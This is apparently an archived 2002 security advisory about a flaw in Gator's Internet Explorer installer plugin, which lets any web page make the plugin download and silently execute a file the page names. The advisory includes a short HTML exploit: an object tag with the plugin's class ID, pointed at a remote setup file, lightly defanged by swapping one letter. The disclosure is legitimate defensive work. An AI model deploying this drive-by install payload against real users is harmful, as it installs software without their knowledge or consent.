Gator Installer Plugin Allows Any Software to be Installed Remotely
24 Feb. 2002
Summary
Gator installer plugin for Internet Explorer (GAIN) suffers from a security hole that allows an attacker to install any software without the user's knowledge or need of interaction.
Credit:
The information has been provided by obscure.
The issue here is that any HTML page can specify the location of the Gator installation file. The installation file is downloaded, and then it is checked for the filename. If the filename is setup.ex_, it is then decompressed and executed. If the file is not compressed it will still execute it. Of course using this method, a malicious user can easily create an HTML page that makes use of the rogue ActiveX component to point at a Trojan file.
Exploit:
(NOTE: The 'o' of object has been replaced with a '0' to prevent execution)
<0bject
id="IEGator"
classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"
align="baseline"
border="0"
width="400"
height="20">
<param name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">
</object>
Solution:
Gator has released a security fix. For more information please see their website: http://www.gator.com/update/
